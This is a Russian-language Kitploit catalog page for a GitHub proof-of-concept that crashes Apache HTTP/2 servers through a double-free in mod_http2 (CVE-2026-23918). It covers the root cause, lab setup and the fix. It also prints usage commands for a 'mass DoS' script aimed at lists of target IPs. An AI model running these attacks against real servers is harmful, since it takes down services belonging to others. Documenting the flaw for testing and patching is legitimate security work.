Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23918 — PoC-эксплойт уязвимости double-free в Apache HTTP/2 (CVE-2026-23918) | Kitploit
Инструменты/GitHubGitHub/rhasan-com/cve-2026-23918
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubrhasan-com/cve-2026-23918

CVE-2026-23918

PoC-эксплойт уязвимости double-free в Apache HTTP/2 (CVE-2026-23918)

Репозиторий
83 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2026-23918: Apache HTTP/2 — отказ в обслуживании (DoS) из-за double-free

CVE-2026-23918 Apache 2.4.66 DoS PoC Python 3

CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | Исправлено в 2.4.67

Уязвимость двойного освобождения (double-free) в mod_http2 (h2_mplx.c) позволяет удалённому злоумышленнику вызвать отказ в обслуживании (крах рабочего процесса) с помощью быстрых RST_STREAM-кадров, которые провоцируют состояние гонки между c1c2_stream_joined() и m_stream_cleanup().


Быстрый старт

root@kitploit:~
# 1. Start the lab
docker-compose up --build -d

# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443

# 3. Watch the crash
docker logs -f apache-lab

# 4. Clean up
docker-compose down -v

Результат: сервер падает в течение ~30s–3min с SIGSEGV — подтверждён надёжный DoS.


Эксплойты

ФайлОписание
poc.pyRapid-RST — быстрая атака, роняет серверы за 30s–3min
exploits/slow-drip.py

Использование Mass DoS

root@kitploit:~
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt

# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7

Что эксплуатируется

Уязвимость срабатывает, когда:

  1. Поток одновременно обрабатывается и c1c2_stream_joined(), и m_stream_cleanup()
  2. Обе функции добавляют один и тот же поток в m->spurge без дедупликации
  3. h2_purge_then_destroy() уничтожает поток дважды → double-free → segfault
изображение

Устранение

Обновитесь до Apache 2.4.67 или новее.

  • NVD — CVE-2026-23918
  • Рекомендации по безопасности Apache

Подробный анализ

Полный анализ уязвимости, разбор первопричины, заметки по эксплуатации и рекомендации по устранению: → rhasan.com/CVE-2026-23918


Авторы

ОбнаруженоBartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl)
Сообщено2025-12-10

Ссылки

  • CWE-415: Double Free
  • oss-sec ML

⭐ Поставьте звёздочку этому репозиторию, если он оказался вам полезен!

Звёзды

Stargazers over time

Скачать инструмент
Slow Drip — продолжительная атака с низкой полосой пропускания
exploits/mass-dos.pyMass DoS — продолжительный DoS по множеству целей
Исправлено
Apache 2.4.67